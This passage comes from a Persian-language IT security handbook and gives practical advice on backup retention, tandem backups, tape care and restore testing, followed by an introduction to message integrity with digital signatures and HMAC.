ﻳﻚ ﺩﻭﺭﺓ ﺣﺪﺍﻗﻠﻲ ﺍﻟﺰﺍﻣﻲ ﮐﺮﺩﻩ ﺑﺎﺷﺪ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺍﺷﺘﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ ١٢٠ﻛﻪ ﺣﺪﺍﻛﺜﺮ ﺯﻣﺎﻥ ﻧﮕﻬﺪﺍﺭﻱ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ
ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻧﻴﺰ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ.
ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻚ ﻧﺸﺎﻧﻪﮔﺮ ﻳﺎ ﻓﻬﺮﺳﺖ ﺍﺯ ﺍﺳﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﻧﮕﻬﺪﺍﺭﻳﺪ .ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﻫﺮ ﻭﻗﺖ ﺑـﻪ
ﺍﺣﻴﺎﻱ ﻣﺠﺪﺩ ﻳﻚ ﻓﺎﻳﻞ ﻧﻴﺎﺯ ﭘﻴﺪﺍ ﻛﻨﻴﺪ ،ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﻫﺮ ﻧﻮﺍﺭ ﺭﺍ ﺑﻄﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﺑﺨﻮﺍﻧﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺑﺮﺭﺳـﻲ ﻓﻬﺮﺳـﺖ ،ﻧـﻮﺍﺭ
119 Differential Backup
120 Data Destruction
ﺑﺨﺶ ﭘﻨﺠﻢ
ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺗﺎ ﭼﻪ ﺯﻣﺎﻧﻲ ﻧﮕﻪ ﺩﺍﺭﻳﻢ
٣١٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺻﺤﻴﺢ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ .ﺩﺭ ﺩﺳﺖ ﺩﺍﺷﺘﻦ ﻳﻚ ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺍﺯ ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﻫﻢ ﺍﻳﺪﺓ ﺧـﻮﺑﻲ ﺍﺳـﺖ ،ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﻓﻬﺮﺳـﺖ
ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ﺷﻤﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻲ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﺍﺣﻴﺎ ﺷﻮﺩ!
ﺍﮔﺮ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺯﻣﺎﻧﻲ ﻛﻪ ﻳﻚ ﺳﻴـﺴﺘﻢ ﭘـﺸﺘﻴﺒﺎﻥ ﺟﺪﻳـﺪ ﺧﺮﻳـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ،
ﺩﺍﺩﻩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺪﺭﺳﺘﻲ ﺭﻭﻱ ﺁﻥ ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻫـﻴﭽﻜﺲ ﻭ
ﻫﻴﭻ ﻛﺠﺎ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺧﻮﺍﻧﺪ .ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﺮﺍﻱ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻬﻢ ﻭ ﺣﺘﻲ ﻣﺆﺳﺴﺔ ﻣﻠﻲ ﺭﺍﻫﺒﺮﻱ ﻓﻀﺎﻳﻲ ﻭ ﻫﻮﺍﻳﻲ ﺍﻳﺎﻻﺕ
ﻣﺘﺤﺪﻩ ) ١٢١(NASAﻫﻢ ﺭﻭﻱ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﺳﺎﻳﺮ ﻧﻜﺎﺕ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ
ﭼﻨﺪ ﺭﺍﻫﻜﺎﺭ ﻣﻨﺎﺳﺐ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﭘﺸﺘﻴﺒﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻤﻮﻋﻪﻫﺎﻱ ﺗﻜﺮﺍﺭﺷﻮﻧﺪﺓ ﭘﺸﺘﻴﺒﺎﻥ
١٢٢
ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺩﻭ ﻣﺠﻤﻮﻋﺔ ﻣﺠﺰﺍﻱ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﭘﺸﺖ ﺳﺮ ﻫﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ .ﺑـﺎ ﺍﻳـﻦ ﺍﺳـﺘﺮﺍﺗﮋﻱ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ،ﺩﻭ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ )ﺑﻨﺎﻣﻬﺎﻱ Aﻭ (Bﺗﻬﻴﻪ ﻣﻲﻛﻨﻴﺪ .ﺳﭙﺲ ﻭﻗﺘﻲ ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺮﺍﻳﺸﻲ ﺧـﻮﺩ -ﺍﻓﺰﺍﻳـﺸﻲ - Aﺭﺍ ﺍﻧﺠـﺎﻡ
ﺩﺍﺩﻳﺪ ،ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ Aﺳﺎﺧﺘﻪ ﻳﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﺭﺍ -ﺣﺘـﻲ ﺍﮔـﺮ ﺩﺭ ﭘـﺸﺘﻴﺒﺎﻥ Bﻣﻮﺟـﻮﺩ ﺑﺎﺷـﻨﺪ -
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﻲﻛﻨﻴﺪ .ﺩﻭﻣﻴﻦ ﺑﺎﺭﻱ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ -ﺍﻓﺰﺍﻳﺸﻲ - Bﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ
ﭘﺸﺘﻴﺒﺎﻥ Bﺳﺎﺧﺘﻪ ﻳﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﻣﻲﻧﻮﻳﺴﻴﺪ -ﺣﺘﻲ ﺍﮔﺮ ﺩﺭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ Aﻣﻮﺟﻮﺩ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺳﻴـﺴﺘﻢ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺧﺮﺍﺑـﻲ
ﺭﺳﺎﻧﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﻘﺎﻭﻡ ﺍﺳﺖ ،ﭼﻮﻥ ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﺩﺭ ﺩﻭ ﻣﺤﻞ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺷﺪﻩ ﺍﺳﺖ ،ﻫﺮﭼﻨﺪﺍﻳﻨﻜﺎﺭ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ ﺗﻬﻴـﺔ
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺻﺮﻑ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺩﻭ ﺑﺮﺍﺑﺮ ﻣﻲﻛﻨﺪ.
ﺟﺎﻳﮕﺰﻳﻨﻲ ﻧﻮﺍﺭﻫﺎ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ
ﻧﻮﺍﺭﻫﺎ ﺭﺳﺎﻧﺔ ﻓﻴﺰﻳﻜﻲ ﻫﺴﺘﻨﺪ ﻭ ﻫﺮ ﺑﺎﺭ ﻛﻪ ﺷﻤﺎ ﺑﻮﺳﻴﻠﻪ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺗﺎ ﺍﻧﺪﺍﺯﻩﺍﻱ ﻛﻴﻔﻴﺘﺸﺎﻥ ﭘﺎﻳﻴﻦ ﻣﻲﺁﻳﺪ .ﺑﺮ ﺍﺳﺎﺱ
ﺗﺠﺮﺑﺔ ﺧﻮﺩ ﺍﺯ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﻭ ﻧﻮﺍﺭ ،ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﺍﺭ ﻳـﻚ ﻃـﻮﻝ ﻋﻤـﺮ ﻣﻔﻴـﺪ ﺗﻌﻴـﻴﻦ ﻛﻨﻴـﺪ .ﺑﻌـﻀﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮﺍﻱ ﻧﻮﺍﺭﻫﺎﻳـﺸﺎﻥ
ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﻣﻲﮔﺬﺍﺭﻧﺪ )ﺑﺮﺍﻱ ﻣﺜﺎﻝ ۳ﺳﺎﻝ ﻳﺎ ۲۰۰۰ﭼﺮﺧﻪ( ،ﻭﻟﻲ ﺑﻌﻀﻲ ﻫﻢ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﻧﻤﻲﻛﻨﻨﺪ .ﺧﻮﺏ ﺩﻗـﺖ ﻛﻨﻴـﺪ ﻛـﻪ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺭ ﺍﻳـﻦ
ﺯﻣﻴﻨﻪ ﭼﻪ ﺗﻮﺻﻴﻪﺍﻱ ﺩﺍﺭﺩ ﻭ ﺁﻧﺮﺍ ﺯﻳﺮ ﭘﺎ ﻧﮕﺬﺍﺭﻳﺪ .ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻫﺰﻳﻨﻪﺍﻱ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻧـﻮﺍﺭ ﺑﻌـﺪ ﺍﺯ ﺍﺗﻤـﺎﻡ ﻋﻤـﺮ ﻣﻔﻴـﺪ ﺁﻥ
ﭘﺲﺍﻧﺪﺍﺯ ﻣﻲﻛﻨﻴﺪ ،ﺑﺎ ﻫﺰﻳﻨﺔ ﺍﻣﻜﺎﻥ ﺟﺒﺮﺍﻥ ﻧﺸﺪﻥ ﻳﻚ ﺧﺴﺎﺭﺕ ﺍﺳﺎﺳﻲ ﺑﺮﺍﺑﺮﻱ ﻧﻤﻲﻛﻨﺪ.
ﻧﻮﺍﺭﮔﺮﺩﺍﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺗﻤﻴﺰ ﻧﮕﻬﺪﺍﺭﻳﺪ
ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻧﻮﺍﺭ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ ،ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺯﻣﺎﻧﻲ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ﻓﺮﻭﺷﻨﺪﺓ ﻧﻮﺍﺭﮔﺮﺩﺍﻥ ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ ﻭ ﻃﺒﻖ ﺗﻮﺻﻴﻪﻫﺎ ﺍﺯ ﻳـﻚ
ﻓﺸﻨﮓ ﺗﻤﻴﺰﻛﻨﻨﺪﺓ ﻣﻨﺎﺳﺐ ﻳﺎ ﻳﻚ ﻣﮑﺎﻧﻴﺰﻡ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺧﻮﺍﻧﺪﻥ ﻳﻚ ﻧﻮﺍﺭ ﺑﺪﻟﻴﻞ ﻛﺜﻴﻒ ﺑﻮﺩﻥ ﻧـﻮﺍﺭﮔﺮﺩﺍﻥ ﺁﺯﺍﺭﺩﻫﻨـﺪﻩ
ﺍﺳﺖ؛ ﺧﺼﻮﺻﹰﺎ ﻭﻗﺘﻲ ﻣﻌﻠﻮﻡ ﺷﻮﺩ ﺩﺍﺩﻩﺍﻱ ﻛﻪ ﺭﻭﻱ ﻧﻮﺍﺭ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺧﺮﺍﺏ ﺍﺳﺖ ﻭ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻳﻚ ﺧﺮﺍﺑﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﺑﮕﻴﺮﺩ.
ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﭘﺸﺘﻴﺒﺎﻥ
ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭼﻨﺪ ﻓﺎﻳﻞ ﺭﺍ ﺑﺮﺍﻱ ﺍﺣﻴﺎ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺨﻮﺍﻧﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺷـﻤﺎ
ﺑﺪﺭﺳﺘﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ .ﺩﺍﺳﺘﺎﻧﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺮﺍﻛﺰ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻭﻗﺘـﻲ ﺳـﺮﺍﻍ
ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﺭﻓﺘﻪﺍﻧﺪ ،ﺁﻧﻬﺎ ﺭﺍ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻳﺎﻓﺘﻪﺍﻧﺪ .ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠـﺔ ﻧﻮﺍﺭﻫـﺎﻱ ﺑـﻲﻛﻴﻔﻴـﺖ ،ﺭﻭﺍﻟﻬـﺎﻱ ﻧﺎﻣﻨﺎﺳـﺐ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ،ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺮﺍﺏ ،ﺧﻄﺎﻱ ﺍﭘﺮﺍﺗﻮﺭ ،ﻳﺎ ﻣﺸﻜﻼﺕ ﺩﻳﮕﺮ ﺑﺎﺷﺪ.
121 U.S. National Aeronautics and Space Administration
122 Tandem Backup
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣١١
ﺣﺪﺍﻗﻞ ﻳﻜﺒﺎﺭ ﺩﺭ ﺳﺎﻝ ﺑﺎﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﻛﻞ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺍﺣﻴﺎ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺑﺪﺭﺳﺘﻲ ﻛﺎﺭ
ﻣﻲﻛﻨﺪ .ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﺘﻔﺎﻭﺕ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱﻧﺸﺪﻩ ﺷﺮﻭﻉ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﻤﺎﻡ ﻧﻮﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﺣﻴﺎ ﻛﻨﻴـﺪ ﻭ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﻜـﺎﺭ
ﺍﻧﺪﺍﺯﻳﺪ ﻳﺎ ﻧﻪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﺩﺭ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺍﺯ ﺩﺳـﺖ ﺭﻓﺘـﻪﺍﻧـﺪ .ﺍﻳـﻦ ﺁﺯﻣﺎﻳـﺸﻬﺎﻱ
ﻋﻤﻠﻲ ﺑﻬﺘﺮﻳﻦ ﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﺸﻒ ﻣﺸﻜﻼﺕ ﻭ ﺣﻞ ﺁﻧﻬﺎ ﻫﺴﺘﻨﺪ.
ﻳﻚ ﺁﺯﻣﺎﻳﺶ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺐ ،ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﻓﺎﻳﻞ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﻳﻜﺒﺎﺭ ﺩﺭ ﻫﻔﺘﻪ ﻳﺎ ﻳﻜﺒﺎﺭ ﺩﺭ ﻣﺎﻩ ﻭ ﺗﻼﺵ ﺑـﺮﺍﻱ ﺍﺣﻴـﺎﻱ ﻣﺠـﺪﺩ ﺁﻥ ﺍﺳـﺖ.
ﺍﻳﻨﻜﺎﺭ ﻧﻪ ﺗﻨﻬﺎ ﻣﺸﺨﺺ ﺧﻮﺍﻫﺪ ﻛﺮﺩ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺟﺎﻣﻊ ﻫﺴﺘﻨﺪ ،ﺑﻠﻜﻪ ﺗﺠﺮﺑﻪ ﺍﻳﻦ ﺍﺣﻴﺎﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻤﻠﻴـﺎﺕ ﺍﺣﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﺭﺍ ﺑـﺴﻴﺎﺭ
ﺳﺎﺩﻩﺗﺮ ﻛﻨﺪ.
ﺑﺤﺚ ﻣﻔﺼﻞ ﺩﺭﺑﺎﺭﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺍﺣﻴﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺿﻮﻉ ﻳﻚ ﻛﺘﺎﺏ ﻣﺠﺰﺍ ﺑﺎﺷﺪ -ﻛﺘﺎﺏ ﻛﻮﺭﺗﻴﺲ ﭘﺮﻳﺴﺘﻮﻥ ،١٢٣ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ
ﻭ ﺗﺮﻣﻴﻢ ١٢٤Unixﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﺑﻪ ﭼﺎﭖ ﺭﺳﻴﺪﻩ ﻳﻚ ﻧﻤﻮﻧﺔ ﻋﺎﻟﻲ ﺍﺳﺖ.
ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻧﺘﻘﺎﻝ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻭﻗﺘﻲ ﺩﺍﺩﻩﺍﻱ ﺭﺍ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑـﺮﺍﻱ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ ﻣـﻲﻓﺮﺳـﺘﻴﺪ،
ﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺷﻤﺎ ﻓﺮﺳﺘﺎﺩﻩﺍﻳﺪ -ﻣﺤﺎﻓﻈﺖﺷﺪﻩ ﺍﺯ ﺧﺮﺍﺑﻲ ﺗﺼﺎﺩﻓﻲ ﻳﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﻋﻤﺪﻱ -ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ .ﻳﻚ ﺍﺳـﺘﺮﺍﺗﮋﻱ
ﻣﺘﺪﺍﻭﻝ ﺷﺎﻣﻞ ﺍﻣﻀﺎﻱ ﻓﺎﻳﻞ ﺑﺼﻮﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ -ﺑﺎ ﻣﺤﺎﺳﺒﺔ ﻳﻚ ﺧﻼﺻﺔ ﺭﻣﺰﺷﺪﻩ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺧﻼﺻﻪ ﺑﺎ ﻳـﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﻣﺘﻘـﺎﺭﻥ ﻳـﺎ
ﻧﺎﻣﺘﻘﺎﺭﻥ -ﻭ ﺳﭙﺲ ﺍﺭﺳﺎﻝ ﺁﻥ ﺑﻪ ﻫﻤﺮﺍﻩ ﻓﺎﻳﻞ )ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻮﺩﺵ ﻫﻢ ﺑﺪﻟﻴﻞ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷـﺪ( ﺍﺳﺖ .ﮔﻴﺮﻧـﺪﻩ ﺧﻼﺻـﻪ ﺭﺍ ﺍﺯ
ﺭﻭﻱ ﻓﺎﻳﻞ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺧﻼﺻﺔ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ .ﺍﮔﺮ ﺍﻳﻨﺪﻭ ﻣﻄﺎﺑﻘﺖ ﻛﺮﺩﻧﺪ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﭘﻴﺎﻡ ﺗـﻀﻤﻴﻦ
ﺷﺪﻩ ﺍﺳﺖ.
ﺗﺎﺑﻊ hashﺗﺼﺪﻳﻖ ﭘﻴﺎﻡ (HMAC) ١٢٥ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﻳﻜﭙﺎﺭﭼﮕﻲ ﭘﻴﺎﻣﻲ ﺍﻧﺘﻘﺎﻝﻳﺎﻓﺘﻪ ﺑﻴﻦ ﺩﻭ ﻃﺮﻑ ﻛﻪ ﺭﻭﻱ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣـﺰﻱ
ﻣﺸﺘﺮﮎ ﺑﺎ ﻫﻢ ﺗﻮﺍﻓﻖ ﻛﺮﺩﻩﺍﻧﺪ ﻣﻲﺑﺎﺷﺪ HMAC .ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﺑﺮﺍﻱ ﻣﺤﺎﺳﺒﺔ ﻳـﻚ ﺗـﺎﺑﻊ ﺧﻼﺻـﻪﭘﻴـﺎﻡ ﺍﺯ ﻫـﺮ ﺩﻭﻱ ﺍﻳﻨﻬـﺎ
ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻲ ﻣﺜﻞ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺳﺮﻱ ﭘﺮﻭﺗﻜﻞ ﻧﻴﺰ ﮔﻨﺠﺎﻧﺪﻩ ﻣﻲﺷﻮﺩ ﺗﺎ ﺣﻤﻼﺕ ﻭﺍﻛﻨﺸﻲ ﺭﺍ ﺧﻨﺜـﻲ ﻛﻨـﺪ.
ﻓﺮﺳﺘﻨﺪﺓ ﭘﻴﺎﻡ ،HMAC ،ﻛﻠﻴﺪ ،ﻭ ﻫﺮ ﺍﻃﻼﻋﺎﺕ ﺍﺿﺎﻓﻪ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻩ ﻭ HMACﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﭘﻴﺎﻡ ﺍﺻﻠﻲ ﺍﻧﺘﻘﺎﻝ ﻣﻲﺩﻫـﺪ .ﮔﻴﺮﻧـﺪﻩ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﻴﺎﻡ ﻭ ﻛﭙﻲ ﺧﻮﺩ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ HMAC ،ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ )ﺑﻪ ﻫﻤﺮﺍﻩ ﺍﻃﻼﻋﺎﺕ ﺍﺿـﺎﻓﻪ ،ﻣﺜـﻞ ﺷـﻤﺎﺭﺓ ﺳـﺮﻱ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ( ،ﻭ
